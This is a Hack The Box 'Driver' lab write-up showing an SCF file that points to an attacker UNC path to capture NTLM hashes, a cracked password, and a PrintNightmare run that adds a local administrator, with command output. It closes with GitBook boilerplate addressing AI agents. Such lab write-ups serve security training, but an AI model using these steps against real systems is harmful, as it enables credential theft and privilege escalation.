> For the complete documentation index, see [llms.txt](https://ajaykumar-kanthi.gitbook.io/write-ups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ajaykumar-kanthi.gitbook.io/write-ups/ippsec-unofficial-cpts-prep/htb-driver.md).

# HTB - Driver

```bash
PORT     STATE SERVICE      VERSION
80/tcp   open  http         Microsoft IIS httpd 10.0
135/tcp  open  msrpc        Microsoft Windows RPC
445/tcp  open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
7680/tcp open  tcpwrapped
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows
```

## Enumeration

### HTTP

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FxmKsLcBEPczAp2NwGJ4W%2Fimage.png?alt=media&amp;token=0baed981-68fd-456e-bea0-10e2dfae2f30" alt=""><figcaption></figcaption></figure>

browsing to the http port asks for credentials.

using weak credentials like `admin : admin` lets us in and also watching the burpsuite response headers also leaks that it expects password admin user.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FZPiyUaK7VVZArWwm2fN2%2Fimage.png?alt=media&amp;token=0affdcd1-53ce-452c-b204-9f3290a7cda2" alt=""><figcaption></figcaption></figure>

After successful login we are presented with a MFP Firmware Update Center. conducts various tests on multi functional printers such as testing firmware updates, drivers etc.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fp5k3oejxZ1bd984nZBKE%2Fimage.png?alt=media&amp;token=e2dfd94e-c403-4a56-8885-393b9e629b5a" alt=""><figcaption></figcaption></figure>

Clicking on Firmware Updates shows an upload form.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FzvGv0K6aSHeDidLvV3cJ%2Fimage.png?alt=media&amp;token=12c850af-ed91-4436-9fdf-aae1b822fc2f" alt=""><figcaption></figcaption></figure>

`Select printer model and upload the respective firmware update to our file share. Our testing team will review the uploads manually and initiates the testing soon.`

So we can do here is we can upload a malicious firmware update file and upon the testing team reviewing it we get a shell.

For this purpose, i can use an .scf file (e.g. `@test.scf`) contains an `[Shell]` section with an `IconFile` path pointing to an **attacker-controlled UNC path** like `\\\\10.10.14.x\\share`

* When a Windows user **browses the folder** in Explorer, Windows automatically tries to load the icon
* This triggers an **NTLM authentication attempt** to the attacker's machine

### SCF File upload Attack

```bash
cat > @test.scf << 'EOF'
[Shell]
Command=2
IconFile=\\10.10.15.204\share\test.ico

[Taskbar]
Command=ToggleDesktop
EOF

```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F6GrAR16HD5poK3rMHERV%2Fimage.png?alt=media&amp;token=171f7636-ddb8-418c-b62e-91b23c1abdbc" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FZHE0zPSg4BEdAUq3mbIM%2Fimage.png?alt=media&amp;token=b8f84d84-e9bd-4c41-91b7-d858f98efeef" alt=""><figcaption></figcaption></figure>

and responder leaked the NTLM hash of Tony which we can crack using hashcat or john.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fb6MZ9BBpHATPB7AGwj5E%2Fimage.png?alt=media&amp;token=48cfddf4-96ad-4e88-aff4-d7ce732fa365" alt=""><figcaption></figcaption></figure>

`tony : liltony`

## Shell as Tony

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fpw2ANXtbcFGYz7Ip1dpX%2Fimage.png?alt=media&amp;token=8d49a295-d685-4840-b244-3d35791c860c" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FqnPlHjR7XsXcD3j5cSGn%2Fimage.png?alt=media&amp;token=368377d8-0316-41c7-aafa-4585a6bcf54b" alt=""><figcaption></figcaption></figure>

```bash
*Evil-WinRM* PS C:\Users\tony> type C:\Users\tony\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
Add-Printer -PrinterName "RICOH_PCL6" -DriverName 'RICOH PCL6 UniversalDriver V4.23' -PortName 'lpt1:'

ping 1.1.1.1
ping 1.1.1.1
```

The history shows tony ran an **`Add-Printer`** command with a specific printer driver.

`RICOH PCL6 UniversalDriver V4.23`

This means the machine can be vulnerable to printnightmare vulnerability.

So an attacker can:

1. Supply a **malicious DLL** as a "printer driver"
2. Tell the Spooler to load it via `RpcAddPrinterDriver()`
3. Since Spooler runs as SYSTEM → **DLL executes as SYSTEM**

**The flaw is in `RpcAddPrinterDriver()`** — a function that:

* Allows **any authenticated user** to install printer drivers
* Runs as **SYSTEM**
* Does **no proper path validation**

### PrintNightmare Attack

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FQBkLIVp6wfxuwEdK687u%2Fimage.png?alt=media&amp;token=4d0d32bc-8bf5-4150-b895-921b7d11e577" alt=""><figcaption></figcaption></figure>

spooler is running on the machine

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FDZRX911geQXjhHPhC2Cu%2Fimage.png?alt=media&amp;token=2055578f-dc3b-490a-9963-53b2d4dd52ae" alt=""><figcaption></figcaption></figure>

```bash
*Evil-WinRM* PS C:\Users\tony> Set-ExecutionPolicy Bypass -Scope Process -Force
*Evil-WinRM* PS C:\Users\tony> Import-Module .\CVE-2021-1675.ps1
*Evil-WinRM* PS C:\Users\tony> Invoke-Nightmare -NewUser "hacker" -NewPassword "Password123!" -DriverName "RICOH PCL6 UniversalDriver V4.23"
[+] created payload at C:\Users\tony\AppData\Local\Temp\nightmare.dll
[+] using pDriverPath = "C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_f66d9eed7e835e97\Amd64\mxdwdrv.dll"
[+] added user hacker as local administrator
[+] deleting payload from C:\Users\tony\AppData\Local\Temp\nightmare.dll
*Evil-WinRM* PS C:\Users\tony> 

```

Used this POC&#x20;

{% embed url="<https://github.com/calebstewart/CVE-2021-1675>" %}

Next, we can login as Hacker and read the root.txt in the Administrator desktop.

## Shell as Hacker ( Local Admin )

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FTDB1ZKgI8MYaRCfmxiev%2Fimage.png?alt=media&amp;token=49094b15-ac04-483c-9200-222f6634adf2" alt=""><figcaption></figcaption></figure>

i can also simply use the metasploit module called `exploit/windows/local/cve_2022_21999_spoolfool_privesc` to directly get to Administrator instead of creating a new local admin.


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://ajaykumar-kanthi.gitbook.io/write-ups/ippsec-unofficial-cpts-prep/htb-driver.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
